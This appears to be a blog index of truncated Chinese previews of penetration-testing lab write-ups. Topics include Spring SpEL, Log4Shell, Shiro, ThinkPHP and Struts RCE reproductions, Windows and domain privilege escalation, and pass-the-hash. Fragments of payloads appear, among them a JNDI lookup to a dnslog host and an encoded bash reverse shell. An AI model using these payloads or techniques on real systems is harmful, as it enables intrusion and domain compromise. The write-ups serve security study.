springboot-spel-rce0x00 漏洞发现 这个是模拟的查找的书的一个页面 发现存在漏洞，因为6*2 已经被计算了 0x01 尝试利用这个漏洞 攻击者使用nc 开启监听 构造一个反弹shell 的指令 将这个构造成字节码 然后构造payload 发送 1http://192.168.79.128:9091/article/?id=${T(java.lang.Run

CVE-2021-442280x00 漏洞发现 发现这个，然后尝试验证是否存在漏洞 1http://IP地址:端口/solr/admin/cores?action=${jndi:ldap://9xovk0.dnslog.cn} 指定ip 端口 发现已经被解析 尝试测试java 版本 0x01 发现可以使用jndi 注入的方式进行利用 使用攻击机监听端口 1234

简介 域环境提权，就是从普通域用户权限到域控管理权限 域渗透的主要目标就是拿下域控管理权限，拿下域控制器，进而拿下整个域 域内的权限提升更像是横向移动，只要获取到了域控的权限就拿到了所有的主机 MS14-068漏洞简介 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 漏洞原理 服务票据是客户端直接发送给服务器，并请求服务资源的。如果服务器没有向域控DC验证PA

Shiro-5500x00 发现漏洞 发现shiro 登录页面 0x01 尝试利用 使用ysoserial.jar 1java -cp ysoserial.jar ysoserial.exploit.JRMPListener 10998 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTI

Fastjson_1.2.45 0x00 检测是否存在 存在漏洞，尝试利用 0x01 使用工具 发现成功的

msfmetepreter 提权在有一个Session的条件之下，直接使用getsystem自动提权 发现成功提权 返回之前的权限 获取hash值是可以使用管理员权限，但是如果想要获取明文密码就需要获取system权限了 如果是高版本的windwos 就会发现提权不了 尝试了解getsystem的原理是什么 如果发现操作失败，可以通过获取当前session 能使用什么方式进行提权(local

漏洞复现Thinkphp5.0.20_RCE0x00 随便访问一个路径，然后获取报错信息 5.0.* 版本 thinkphp相关工具扫描结果发现路由过滤不严谨 那就直接使用payload 尝试 1/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put

简介不建议自动化提权，可能对主机造成很严重的问题 目的对于提权的目的，由于有些情况之下我们需要做某些一些操作的时候没有权限，我们只能使用提权的方式进行权限提升，以此来完成我们的操作 概述windwos 中常见的权限 用户权限( users ) 管理员权限( administrator ) 系统权限( system ) 访客权限( guest ) windows 提权 user –>

S2-045这个是一个rce 漏洞 0x00 这是一个模拟的上传文件的一个页面 尝试上传文件，然后抓包 修改content-type 1Content-Type:"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#

PtT 简介本质上就是利用黄金票据或者是白银票据进行横向移动的一种方式 黄金票据的伪造需要的信息有（也就是tgt） 域名 域sid KRBTGT 用户hash 用户名（一般为管理员的） PTH简介PASS THE Hash 也叫 Hash 传递攻击，简称 PTH。模拟用户登录不需要用户明文密码，就可以直接 用获取到的 Hash 来登录目标系统。 利用成功的前提条件是： 开启 445